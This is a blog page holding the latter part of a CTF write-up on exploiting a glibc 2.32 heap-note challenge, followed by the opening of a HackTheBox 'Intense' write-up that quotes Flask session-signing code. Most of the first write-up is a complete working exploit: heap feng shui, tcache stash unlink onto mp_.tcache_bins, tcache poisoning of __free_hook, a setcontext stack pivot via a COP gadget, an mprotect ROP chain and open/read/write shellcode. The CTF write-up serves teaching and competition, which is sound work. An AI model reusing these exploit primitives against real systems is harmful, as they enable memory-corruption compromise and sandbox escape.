alloc(0x820, (p64(0) + p64(0x21)) * (0x320 / 16) + p64(0) + p64(0x111)) # 3
alloc(0x450, (p64(0) + p64(0x21)) * 4 + p64(0) + p64(0x111)) # 5
free(3)
log.info('hopefully cleaned up heap')
# get another unsorted

Now, I added 5 more 0x110 chunks. This cannot be done directly. Rather, I performed the allocations (and some frees) so that the unsorted chunk created from freeing chunk 0 runs out after 3 0x110 allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6's data (which we control), and allocated a 0x110 chunk from there (giving us an overlap over a future smallbin chunk). Since this last chunk will go into the unsorted bin before reaching the smallbin, I had to ensure that it would not coalesce with the neighboring unsorted chunk, so I freed a previous 0x110 chunk and allocated one more from the unsorted bin to act as a guard chunk; the nice thing about the tcache memset is that I can free small chunks like these to help with the heap massage without worrying about them ever being returned.

As for why I chose index 6 as the one to overlap and overwrite the last smallbin chunk's bk: I mentioned it in the code comments above, but there was a 0x110 chunk right after it, and it was also the first of the three chunks I kept in memory.

# empty are 0 3 5 8 11 18, until the newly added unsorted bin from freeing 0 runs out, the large chunk will be in largebin, but then will move back to unsorted since the new unsorted can't support all 5 allocations
alloc(0x108, 'stash') # 0
alloc(0x108, 'stash') # 3
alloc(0x138, 'stash') # 5 (otherwise metadata for 10 gets overwritten)
alloc(0x108, 'temp') # 5
alloc(0x108, 'stash') # 8
# now allocate a big one so next one can overlap with 6
alloc(0xd10, '\x00') # 11
alloc(0x108, 'stash') # 18
alloc(0x108, 'stash') # 5, free this one early on so it goes into tcache, and helps prevents 18 from consolidating with unsorted

At this stage, we have 15 chunks of size 0x110: indices 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, and 18. To avoid any coalescing and keep this number of chunks for the tcache and smallbin frees, I carefully considered the following rules (which you can verify in a debugger):

1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)

2. 12 will back coalesce into the large unsorted if not entered into tcache.

3. 0, 3 is a chain

4. 8, 10 is a chain

5. 5 is on top of the big unsorted chunk

6. 2, 4 are isolated

7. 7 has the potential to go into unsorted and merge with a smallbin

8. 18 must be the last one into the smallbin

Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.

# only 1, 6, 9, 11 still left
alloc(0x450, '\x00') # 0, trigger movement from unsorted chain to smallbin for the 0x110 chunks
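The free chain can be checked against rule 8 with a small list-based model. It assumes that frees never touch the wiped counts (so exactly the first 7 frees land in tcache), that free() links chunks at the head of the unsorted bin, that the sorting pass walks the unsorted bin from its tail and links each chunk at the head of the smallbin, and that malloc takes smallbin chunks from the tail.

```python
TCACHE_COUNT = 7
free_order = [14, 16, 3, 10, 5, 12, 7, 17, 2, 13, 15, 0, 8, 4, 18]

to_tcache = free_order[:TCACHE_COUNT]        # the bin fills up after 7 frees
to_unsorted = free_order[TCACHE_COUNT:]

unsorted = []                                # index 0 = head (fd side)
for idx in to_unsorted:
    unsorted.insert(0, idx)                  # free() links new chunks at the head

smallbin = []                                # index 0 = head (fd side)
for idx in reversed(unsorted):               # sorting walks from the tail (oldest first)
    smallbin.insert(0, idx)                  # and links each chunk at the smallbin head

removal = smallbin[::-1]                     # last(bin) is the tail, so FIFO overall
returned, stashed = removal[0], removal[1:]
print(to_tcache)                             # [14, 16, 3, 10, 5, 12, 7]
print(returned, stashed)                     # 17 [2, 13, 15, 0, 8, 4, 18]
```

Index 17 is what the triggering 0x110 request gets back, and index 18 is the final chunk stashed, i.e. the one whose corrupted bk performs the write.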

Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.

0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x55e0675e3860 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e3860
0x110 [corrupted]
FD: 0x55e0675e3640 —▸ 0x55e0675e3090 —▸ 0x55e0675e2810 —▸ 0x55e0675e22b0 —▸ 0x55e0675e54f0 ◂— ...
BK: 0x55e0675e5710 —▸ 0x55e0675e2b40 —▸ 0x55e0675e52d0 —▸ 0x55e0675e54f0 —▸ 0x55e0675e22b0 ◂— ...

Since edit can no longer be used, I had to free index 6 into the unsorted bin and then allocate over it again to overwrite the bk pointer of the index 18 0x110 smallbin chunk, so that the stash writes a libc address into mp_.tcache_bins. Making another request from the smallbin then triggers the stash. The 0x110 smallbin is also corrupted afterwards, so you should avoid allocating from it.

payload = (p64(0) + p64(0x21)) * 5 + p64(0) + p64(0x110) + p64(heapbase + 0x1090) + p64(libc.symbols['mp_'] + 80 - 0x10) # overwrite .tcache_bins
alloc(0x430, payload) # 0, overlap smallbin 0x110 head's chunk
alloc(0x108, '\x00') # 2, trigger smallbin stash unlink
log.info('tcache stash unlinked, overwrote mp_.tcache_bin')
# can't touch 0x110 smallbin ever again

0x110 [ 7]: 0x55e0675e3650 ◂— 0x55e539584543
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x0
0x110 [corrupted]
FD: 0x55e0675e3640 ◂— 0x55e539584543
BK: 0x7f23ee2002c0 (mp_+64) ◂— 0x408
0x1800: 0x55e0675e3860 —▸ 0x7f23ee201260 (main_arena+1728) ◂— 0x55e0675e3860
pwndbg> p mp_
$1 = {
trim_threshold = 131072,
top_pad = 131072,
mmap_threshold = 131072,
arena_test = 8,
arena_max = 0,
n_mmaps = 0,
n_mmaps_max = 65536,
max_n_mmaps = 0,
no_dyn_threshold = 0,
mmapped_mem = 0,
max_mmapped_mem = 0,
sbrk_base = 0x55e0675e2000 "",
tcache_bins = 139792295660800,
tcache_max_bytes = 1032,
tcache_count = 7,
tcache_unsorted_limit = 0
}

Between index 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.

Then, I pulled a chunk from the large unsorted chunk to overlap what was index 9 and, following the pointer obfuscation rules, changed its tcache next pointer to __free_hook.

# 0, 1, 2, 9, 11, use 9 as the target for tcache poison, 1 was leftover but doesn't matter really (was a mistake on my part, but good that i still saved as a backup)
alloc(0x780, '\x00') # 3
alloc(0x1500, p64(0) * 4 + 'fizzbuzz') # 4
free(9) # created tcache chain
malicious_addr = ((heapbase + 0x2050) >> 12) ^ libc.symbols['__free_hook']
alloc(0x400, p64(0) * 9 + p64(0x1511) + p64(malicious_addr)[:-1]) # 4, tcache poison
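Here is a toy Python model of why two chunks go into the 0x1510 tcache bin before the poison. It assumes glibc 2.32 semantics: malloc only takes from a tcache bin whose count is positive, tcache_get rejects entries that are not 16-byte aligned, and next pointers are stored mangled. The fresh chunk address and the __free_hook address are hypothetical placeholders; index 9's address is heapbase + 0x2050, as in the exploit.

```python
def protect_ptr(pos, ptr):
    return (pos >> 12) ^ ptr

class TcacheBin:
    """Toy tcache bin: mem maps an entry address to the mangled next pointer stored there."""
    def __init__(self):
        self.head, self.count, self.mem = 0, 0, {}

    def put(self, e):                                  # tcache_put
        self.mem[e] = protect_ptr(e, self.head)
        self.head = e
        self.count += 1

    def get(self):                                     # __libc_malloc + tcache_get
        if self.count == 0:
            return None                                # malloc falls through to _int_malloc
        e = self.head
        if e % 0x10:
            raise RuntimeError("malloc(): unaligned tcache chunk detected")
        self.head = protect_ptr(e, self.mem.get(e, 0))  # REVEAL_PTR(e->next)
        self.count -= 1
        return e

HEAPBASE = 0x55e0675e2000
FRESH = 0x55e0675e6000        # hypothetical: the 0x1510 chunk pulled from the wilderness
IDX9 = HEAPBASE + 0x2050      # index 9's user pointer
FREE_HOOK = 0x7f23ee204e40    # hypothetical __free_hook address

tb = TcacheBin()
tb.put(FRESH)                                  # count 1
tb.put(IDX9)                                   # count 2, head = index 9
tb.mem[IDX9] = protect_ptr(IDX9, FREE_HOOK)    # overlapping write (malicious_addr)
first, second = tb.get(), tb.get()
print(hex(first), hex(second))                 # 0x55e0675e4050 0x7f23ee204e40
```

Had only index 9 been freed, the count would drop to 0 after the first allocation, and the second request would never be served from the poisoned entry.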

Now, we must decide how to escape the seccomp filter. Of course, we will need an open/read/write ROP chain, but how can we pivot with only control over __free_hook (which implies we have control over rdi)?

One idea that we had was setcontext, which is a well known function to use as a stack pivot.

Dump of assembler code for function setcontext:
0x00007f23ee08e520 <+0>: endbr64
0x00007f23ee08e524 <+4>: push rdi
0x00007f23ee08e525 <+5>: lea rsi,[rdi+0x128]
0x00007f23ee08e52c <+12>: xor edx,edx
0x00007f23ee08e52e <+14>: mov edi,0x2
0x00007f23ee08e533 <+19>: mov r10d,0x8
0x00007f23ee08e539 <+25>: mov eax,0xe
0x00007f23ee08e53e <+30>: syscall
0x00007f23ee08e540 <+32>: pop rdx
0x00007f23ee08e541 <+33>: cmp rax,0xfffffffffffff001
0x00007f23ee08e547 <+39>: jae 0x7f23ee08e66f <setcontext+335>
0x00007f23ee08e54d <+45>: mov rcx,QWORD PTR [rdx+0xe0]
0x00007f23ee08e554 <+52>: fldenv [rcx]
0x00007f23ee08e556 <+54>: ldmxcsr DWORD PTR [rdx+0x1c0]
0x00007f23ee08e55d <+61>: mov rsp,QWORD PTR [rdx+0xa0]
0x00007f23ee08e564 <+68>: mov rbx,QWORD PTR [rdx+0x80]
0x00007f23ee08e56b <+75>: mov rbp,QWORD PTR [rdx+0x78]
0x00007f23ee08e56f <+79>: mov r12,QWORD PTR [rdx+0x48]
0x00007f23ee08e573 <+83>: mov r13,QWORD PTR [rdx+0x50]
0x00007f23ee08e577 <+87>: mov r14,QWORD PTR [rdx+0x58]
0x00007f23ee08e57b <+91>: mov r15,QWORD PTR [rdx+0x60]

However, starting around glibc 2.29, setcontext reads the context from rdx instead of rdi, and we do not control rdx. After some attempts at FSOP and at forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget. It seems to exist in many newer glibc versions, loads rdx from [rdi + 8], and then calls an address relative to rdx. In this libc, it was the following:

mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];

This makes it relatively trivial, as we can just set up the heap for the rop, taking care of the one push rcx instruction that setcontext performs. I went with an mprotect call to make the heap rwx and then returned into shellcode on the heap that does open, read, write, and exit. Due to my earlier spamming of 0x21 metadata, I could not allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:

super_gadget = libc.address + 0x00000000001296b0 #: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
poprsi = libc.address + 0x00000000000ba607#: pop rsi; ret;
poprdx = libc.address + 0x0000000000089972#: pop rdx; ret;
poprdi = libc.address + 0x0000000000027b26 #: pop rdi; ret;
alloc(0x1500, '\x00') # 5
alloc(0x1500, p64(super_gadget)) # 6
log.info('tcache poisoned onto __free_hook, overwriting with super gadget at 0x%x' % super_gadget)
shellcode = '''
mov rax, 2
mov rdi, %s
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
sub rsi, 0x100
xchg rdi, rax
xor rax, rax
mov dl, 100
syscall
xor rax, rax
mov al, 1
mov rdi, 1
syscall
mov al, 60
xor rdi, rdi
syscall
'''% int(heapbase + 0x2920)
shellcode = asm(shellcode)
# need it to call setcontext + 61 and then stack pivot onto our heap, poprdi written afterwards due to push rcx, and rcx derives its value from [rdx + 0xa8]
payload = (p64(0) + p64(heapbase + 0x2410) + p64(0) * 2 + p64(libc.symbols['setcontext'] + 61) + p64(poprdi) + p64(heapbase) + p64(poprsi) + p64(0x5000) + p64(poprdx) + p64(7) + p64(libc.symbols['mprotect']) + p64(heapbase + 0x2920 + 0x10)).ljust(0xa0, '\x00') + p64(heapbase + 0x2410 + 0x30) + p64(poprdi)
alloc(0x500, payload) # 7, have to avoid other larger chunks cause they might be seen as tcache and get pointers inside since i spammed heap
alloc(0x500, 'flag.txt'.ljust(0x10, '\x00') + shellcode)
print p.recvall()
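The payload above is a fake context whose offsets come straight from the two gadgets. The sketch below builds the same layout from named offsets. It assumes, as in the exploit, that the freed chunk is the frame itself, so rdi points at it and the super gadget loads rdx = [rdi + 8] = the frame address. The 0xa8 slot is the rcx value that setcontext pushes before returning, per the comment in the exploit. `build_frame`, the offset names, and the addresses in the usage lines are all hypothetical.

```python
import struct

# Offsets consumed by the gadgets (from the super gadget and the setcontext disassembly).
RDX_SLOT = 0x08   # super gadget: mov rdx, [rdi + 8]
CALL_SLOT = 0x20  # super gadget: call [rdx + 0x20]  -> setcontext + 61
RSP_SLOT = 0xa0   # setcontext + 61: mov rsp, [rdx + 0xa0]
RCX_SLOT = 0xa8   # setcontext later loads rcx from [rdx + 0xa8] and pushes it


def p64(value):
    """Little-endian qword, like pwntools' p64."""
    return struct.pack("<Q", value)


def build_frame(frame_addr, setcontext61, chain):
    """Fake context for the rdi -> rdx pivot, assuming free() is called on frame_addr.

    chain[0] is delivered by the push rcx / ret at the end of setcontext, and rsp
    is pointed just past it so the remaining qwords act as the rop stack."""
    chain_off = CALL_SLOT + 8
    if chain_off + 8 * len(chain) > RSP_SLOT:
        raise ValueError("rop chain would overlap the rsp slot")
    frame = bytearray(RCX_SLOT + 8)
    struct.pack_into("<Q", frame, RDX_SLOT, frame_addr)
    struct.pack_into("<Q", frame, CALL_SLOT, setcontext61)
    for i, qword in enumerate(chain):
        struct.pack_into("<Q", frame, chain_off + 8 * i, qword)
    struct.pack_into("<Q", frame, RSP_SLOT, frame_addr + chain_off + 8)
    struct.pack_into("<Q", frame, RCX_SLOT, chain[0])
    return bytes(frame)


# Usage with hypothetical addresses: mprotect(heap, 0x5000, 7), then jump to shellcode.
heap = 0x55d0c0a3e000
pop_rdi, pop_rsi, pop_rdx, mprotect = 0x1111, 0x2222, 0x3333, 0x4444
frame = build_frame(heap + 0x2410, 0xdead,
                    [pop_rdi, heap, pop_rsi, 0x5000, pop_rdx, 7, mprotect, heap + 0x2930])
print(len(frame), frame[RSP_SLOT:RSP_SLOT + 8].hex())
```

The push rcx writes chain[0] at rsp - 8, which is exactly where the chain already starts. This is why the exploit can also leave poprdi at offset 0x28.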

Final Exploit:

Do note that in this writeup, I nop'd out the sleep for the sake of local testing. The CTF server is no longer up, so I also ran the exploit against the provided ynetd binary with a 3-second timeout added to my script for each menu option. It still finished more than 10 minutes before the SIGALRM limit, so it should have been fine during the actual competition.

from pwn import *
elf = ELF('./challenge')
libc = ELF('./') # 2.32
p = remote('localhost', 1337)
def wait():
def alloc(size, data, line=True):
assert(size > 0x100 and size <= 0x2000)
if len(data) == size:
line = False
if line:
def free(idx):
def leak(idx):
def edit(idx, data, line=True):
if line:
alloc(0x438, 'A' * 0x438) # 0
alloc(0x448, 'B' * 8) # 1, leave fd_nextsize part be null if target to backward consolidate onto is of large size
alloc(0x108, 'test') # 2
alloc(0x438, 'C' * 0x438) # 3, smaller than B
alloc(0x108, 'test') # 4
alloc(0x418, 'D' * 0x418) # 5
alloc(0x458, 'E' * 0x458) # 6, bigger than B
alloc(0x108, 'test') # 7
alloc(0x500, 'test') # 1, trigger largebin allocation, because of different sizes, we'll have 2 sets of pointer in each chunk in largebin
free(0) # backwards consolidate to help us start forging size, this goes to unsorted now from largebin, also have largebin pointers now from the chunk it coalesced from
alloc(0x438 + 0x30, 'A' * 0x448 + p64(0x2151)[:-1]) # 0, to help forge chunk header
alloc(0x448-0x30, 'B' * (0x448-0x30)) # 3, clear our unsorted bin, also very important because this will be linked into the unsorted chain to help us with the dangling pointer partial overwrite
# 0, 1, 2, 3, 4, 5, 7
# now recover large bins and bring stuff back into unsorted
alloc(0x438, 'C' * 0x438) # 6
alloc(0x458, 'E' * 0x458) # 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8
free(6) # unsorted chain
free(5) # coalesce in unsorted to get leftover pointers
# 0, 1, 2, 4, 7
# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata)
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin
# 0, 1, 2, 3, 4, 5, 7
# at this point we have an unsorted and largebin, let's clean up the unsorted and largebin
alloc(0x430, 'test') # 6
alloc(0x410, 'test') # 8
alloc(0x808, 'G' * 0x808) # 9
alloc(0x4f8, 'H' * 0x4f8) # 10
alloc(0x468, 'temp') # 11
# for stashing into tcache (since tcache won't get wiped unless we call malloc in this program)
alloc(0x108, 'stash') # 12
alloc(0x108, 'stash') # 13
alloc(0x108, 'stash') # 14
alloc(0x108, 'stash' + '\x00' * 3 + p64(0) + (p64(0) + p64(0x21)) * 13) # 15, for the later 0x1510 fake chunk that i will free to tcache poison
alloc(0x108, 'stash') # 16
alloc(0x108, 'stash') # 17
alloc(0x108, 'temp') # 18, so no back coalescing later when we send 17 to unsorted
edit(9, (p64(0) + p64(0x21)) * (0x800 / 16) + p64(0x2150), line=False)
# back coalesce
free(10)
log.info("achieved backwards coalesce")
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# everything from 0 - 9 is overlapped
heapbase = u64(p.recv(14)[8:].ljust(8, '\x00')) - 0x15c0
log.info('heap base: 0x%x' % heapbase)
# libc 2.32 has null ending for main arena + 96 libc address
alloc(0xa90, p64(0) * 3 + p64(0x421)) # 10, should align right over index 5, fix size of index 8
alloc(0x2000, 'test') # 18 send unsorted chunk into largebin, get largebin pointers into index 5
libcleak = u64(p.recv(6).ljust(8, '\x00'))
libc.address = libcleak - 0x1bf270
log.info('libc base: 0x%x' % libc.address)
free(10) # go back up
# fixing index 5 size
alloc(0x670, 'test') # 10
alloc(0x430, (p64(0) + p64(0x21)) * (0x410 / 16) + p64(0) + p64(0x441)) # 18
# recoalesce it up
alloc(0x108, p64(0) * 2 + (p64(0) + p64(0x21))*5) # 10, fix size of index 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# now we need to get stuff into tcache to be able to tcache poison, but they keep clearing tcache
# so tcache stash unlink onto malloc_par's tcache_bins (mp_.tcache_bins)
# but to do tcache stash unlink, we technically need to stash 6 chunks into tcache and 2 chunks into smallbin, and then modify bk of last chunk getting stashed
# here, tcache is wiped every time we call malloc so that won't work... so we need 15 chunks of the same size, to all free and then move the latter 8 to smallbin, and then overwrite bk of last one to stash
# we have 0x108 in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10 as of now need 5 more
'''
0x56494efda520: 0x000056494fd352c0 0x000056494fd36b40 S
0x56494efda530: 0x000056494fd35b50 X 0x000056494fd35c60
0x56494efda540: 0x000056494fd360a0 X 0x000056494fd361b0
0x56494efda550: 0x000056494fd365f0 S 0x000056494fd36a30 X
0x56494efda560: 0x000056494fd35730 0x000056494fd37050 S
0x56494efda570: 0x000056494fd35710 X 0x000056494fd37d60
0x56494efda580: 0x000056494fd381d0 X 0x000056494fd382e0 X
0x56494efda590: 0x000056494fd383f0 X 0x000056494fd38500 X
0x56494efda5a0: 0x000056494fd38610 X 0x000056494fd38720 X
0x56494efda5b0: 0x0000000000000000
0x56494fd37d50 is the cutoff of the massive unsorted chunk at this point
from here, looks like a good choice to save index 9, 1, and 6 (so one for tcache poison, one for bk overwrite, and the other just for padding/backup purposes (also don't want an extra unsorted chunk))
so we will free 0 3 5 8 11 and have free slots 0 3 5 8 11 18, we can use one of these to help as pad
however freeing some of these directly is bad as it creates a messy unsorted chain, better to do the allocate 2 chunks, recoalesce back trick to make our target chunks to be freed 0x21
'''
# coalesce 11 into big unsorted
# fix index 3, remember to fix the 0x111 metadata issue (for 2, 4, 7), but we can repair this later
alloc(0x480, (p64(0) + p64(0x21)) * (0x430 / 16) + (p64(0) + p64(0x21)) * 5) # 11
# fix index 5
alloc(0x900, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * (0x80 / 2) + (p64(0) + p64(0x21)) * 10) # 11
# free index 8 now too, could have been done earlier
# fix index 9 to size metadata 0x1511 for potential tcache poison
alloc(0x17f0, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * 2 + p64(0) + p64(0x1511)) # 5, around size 0x1420~0x1430ish to escape the memset on tcache_perthread_struct
# repair the 0x111 size for 2, 4, 7 (7 is still clean, so it's good) note how among 1, 6, 9, only 6 is before one of the 0x110 chunks? use 6 for the bk overwrite
alloc(0x820, (p64(0) + p64(0x21)) * (0x320 / 16) + p64(0) + p64(0x111)) # 3
alloc(0x450, (p64(0) + p64(0x21)) * 4 + p64(0) + p64(0x111)) # 5
free(3)
log.info('hopefully cleaned up heap')
# get another unsorted
# empty are 0 3 5 8 11 18, until the newly added unsorted bin from freeing 0 runs out, the large chunk will be in largebin, but then will move back to unsorted since the new unsorted can't support all 5 allocations
alloc(0x108, 'stash') # 0
alloc(0x108, 'stash') # 3
alloc(0x138, 'stash') # 5 (otherwise metadata for 10 gets overwritten)
alloc(0x108, 'temp') # 5
alloc(0x108, 'stash') # 8
# now allocate a big one so next one can overlap with 6
alloc(0xd10, '\x00') # 11
alloc(0x108, 'stash') # 18
alloc(0x108, 'stash') # 5, free this one early on so it goes into tcache, and helps prevents 18 from consolidating with unsorted
# now we finally have 15 of these 0x110 chunks, we need the one in 18 to be the last in smallbin
'''
0x563e099eb520: 0x0000563e09b562c0 X 0x0000563e09b57b40
0x563e099eb530: 0x0000563e09b56b50 X 0x0000563e09b563d0 X
0x563e099eb540: 0x0000563e09b570a0 X 0x0000563e09b57760 X
0x563e099eb550: 0x0000563e09b575f0 0x0000563e09b57a30 X
0x563e099eb560: 0x0000563e09b56820 X 0x0000563e09b58050
0x563e099eb570: 0x0000563e09b56710 X 0x0000563e09b56930
0x563e099eb580: 0x0000563e09b591d0 X 0x0000563e09b592e0 X
0x563e099eb590: 0x0000563e09b593f0 X 0x0000563e09b59500 X
0x563e099eb5a0: 0x0000563e09b59610 X 0x0000563e09b59720 X
0x563e099eb5b0: 0x0000563e09b57650 X 0x0000000000000000
0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18
12 to 17 is a chain, (12 will back coalesce), 0, 3 is a chain, 8, 10 is a chain, 5 is on top of unsorted, 7 is under a potential new unsorted (so will coalesce with the smallbin and move to unsorted), 18 needs to be the last one inserted, 2, 4 are isolated
so let's do the following free order: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18
'''
# only 1, 6, 9, 11 still left
alloc(0x450, '\x00') # 0, trigger movement from unsorted chain to smallbin for the 0x110 chunks
payload = (p64(0) + p64(0x21)) * 5 + p64(0) + p64(0x110) + p64(heapbase + 0x1090) + p64(libc.symbols['mp_'] + 80 - 0x10) # overwrite .tcache_bins
alloc(0x430, payload) # 0, overlap smallbin 0x110 head's chunk
alloc(0x108, '\x00') # 2, trigger smallbin stash unlink
log.info('tcache stash unlinked, overwrote mp_.tcache_bins')
# can't touch 0x110 smallbin ever again
# 0, 1, 2, 9, 11, use 9 as the target for tcache poison, 1 was leftover but doesn't matter really (was a mistake on my part, but good that i still saved as a backup)
alloc(0x780, '\x00') # 3
alloc(0x1500, p64(0) * 4 + 'fizzbuzz') # 4
free(4)
free(9) # created tcache chain
malicious_addr = ((heapbase + 0x2050) >> 12) ^ libc.symbols['__free_hook']
alloc(0x400, p64(0) * 9 + p64(0x1511) + p64(malicious_addr)[:-1]) # 4, tcache poison
super_gadget = libc.address + 0x00000000001296b0 #: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
poprsi = libc.address + 0x00000000000ba607#: pop rsi; ret;
poprdx = libc.address + 0x0000000000089972#: pop rdx; ret;
poprdi = libc.address + 0x0000000000027b26 #: pop rdi; ret;
alloc(0x1500, '\x00') # 5
alloc(0x1500, p64(super_gadget)) # 6
log.info('tcache poisoned onto __free_hook, overwriting with super gadget at 0x%x' % super_gadget)
shellcode = '''
mov rax, 2
mov rdi, %s
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
sub rsi, 0x100
xchg rdi, rax
xor rax, rax
mov dl, 100
syscall
xor rax, rax
mov al, 1
mov rdi, 1
syscall
mov al, 60
xor rdi, rdi
syscall
'''% int(heapbase + 0x2920)
shellcode = asm(shellcode)
# need it to call setcontext + 61 and then stack pivot onto our heap, poprdi written afterwards due to push rcx, and rcx derives its value from [rdx + 0xa8]
payload = (p64(0) + p64(heapbase + 0x2410) + p64(0) * 2 + p64(libc.symbols['setcontext'] + 61) + p64(poprdi) + p64(heapbase) + p64(poprsi) + p64(0x5000) + p64(poprdx) + p64(7) + p64(libc.symbols['mprotect']) + p64(heapbase + 0x2920 + 0x10)).ljust(0xa0, '\x00') + p64(heapbase + 0x2410 + 0x30) + p64(poprdi)
alloc(0x500, payload) # 7, have to avoid other larger chunks cause they might be seen as tcache and get pointers inside since i spammed heap
alloc(0x500, 'flag.txt'.ljust(0x10, '\x00') + shellcode)
print p.recvall()

Concluding thoughts:

While this challenge was overall pretty decent, as it showed some up-to-date glibc tricks, I felt that some of its elements were unnecessary and added artificial difficulty. It would have been just as difficult conceptually with 2-3 more allocation slots, rather than forcing players who already had the correct plan to rewrite their exploit several times. Combining a SIGALRM with a 2-second sleep in the main menu also didn't add any value. Additionally, while the custom patch to this libc makes sense and did contribute to the overall quality, I do see libc patching happening more often. I hope CTF authors do not abuse it to create extremely contrived heap note problems.

Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all those teammates that worked with me in DiceGang, which placed 4th overall!

Saturday, November 14, 2020

Intense HacktheBox Writeup


Intense was a hard box involving web exploitation techniques such as sqlite injection and a hash length extension attack, snmp exploitation, and an easy pwnable for root. Overall, I thought sokafr did a great job with this box.

To begin, our initial port scan revealed the following ports from masscan:

22/tcp  open   ssh     syn-ack ttl 63

80/tcp  open   http    syn-ack ttl 63

161/tcp closed snmp    reset ttl 63

Opening up port 80, we see the following:

It provides us with guest:guest as credentials, as well as a link to the zipped source code, which we can download. Inside, you can find some templates and other misc. info, but the most important files are the 4 python files of this flask app (which uses a sqlite database).

Some important takeaways from this include the following observations:

@app.route("/login", methods=["GET"])
def login():
    return render_template("login.html", page="login")

@app.route("/postlogin", methods=["POST"])
def postlogin():
    # return user's info if exists
    data = try_login(request.form)
    if data:
        resp = make_response("OK")
        # create new cookie session to authenticate user
        session = lwt.create_session(data)
        cookie = lwt.create_cookie(session)
        resp.set_cookie("auth", cookie)
        return resp
    return "Login failed"

def hash_password(password):
    """ Hash password with a secure hashing function """
    return sha256(password.encode()).hexdigest()

def query_db(query, args=(), one=False):
    cur = get_db().execute(query, args)
    rv = cur.fetchall()
    return (rv[0] if rv else None) if one else rv

def try_login(form):
    """ Try to login with the submitted user info """
    if not form:
        return None
    username = form["username"]
    password = hash_password(form["password"])
    result = query_db("select count(*) from users where username = ? and secret = ?", (username, password), one=True)
    if result and result[0]:
        return {"username": username, "secret":password}
    return None

The user information is stored in the sqlite database as a username and a secret (the sha256 hash of the submitted password). Because try_login() passes both values to query_db() as bound parameters (the ? placeholders), this login point is safe from sqli.

The session is built and checked in the following functions:

@app.route("/postlogin", methods=["POST"])
def postlogin():
    # return user's info if exists
    data = try_login(request.form)
    if data:
        resp = make_response("OK")
        # create new cookie session to authenticate user
        session = lwt.create_session(data)
        cookie = lwt.create_cookie(session)
        resp.set_cookie("auth", cookie)
        return resp
    return "Login failed"

def index():
    session = get_session(request)
    if session and "username" in session:
        user = get_user(session["username"], session["secret"])
        return render_template("home.html", page="home", user=user)
    return render_template("home.html", page="home")

SECRET = os.urandom(randrange(8, 15))

class InvalidSignature(Exception):
    pass

def sign(msg):
    """ Sign message with secret key """
    return sha256(SECRET + msg).digest()

def verif_signature(data, sig):
    """ Verify if the supplied signature is valid """
    return sign(data) == sig

def parse_session(cookie):
    """ Parse cookie and return dict
    @cookie: "key1=value1;key2=value2"
    return {"key1":"value1","key2":"value2"}
    """
    b64_data, b64_sig = cookie.split('.')
    data = b64decode(b64_data)
    sig = b64decode(b64_sig)
    if not verif_signature(data, sig):
        raise InvalidSignature
    info = {}
    for group in data.split(b';'):
        try:
            if not group:
                continue
            key, val = group.split(b'=')
            info[key.decode()] = val
        except Exception:
            continue
    return info

def create_session(data):
    """ Create session based on dict
    @data: {"key1":"value1","key2":"value2"}
    return "key1=value1;key2=value2;"
    """
    session = ""
    for k, v in data.items():
        session += f"{k}={v};"
    return session.encode()

def create_cookie(session):
    cookie_sig = sign(session)
    return b64encode(session) + b'.' + b64encode(cookie_sig)

def get_session(request):
    """ Get user session and parse it """
    if not request.cookies:
        return None
    if "auth" not in request.cookies:
        return None
    cookie = request.cookies.get("auth")
    try:
        info = lwt.parse_session(cookie)
    except lwt.InvalidSignature:
        return {"status": -1, "msg": "Invalid signature"}
    return info

def is_admin(request):
    session = get_session(request)
    if not session:
        return None
    if "username" not in session or "secret" not in session:
        return None
    user = get_user(session["username"], session["secret"])
    return user.role == 1

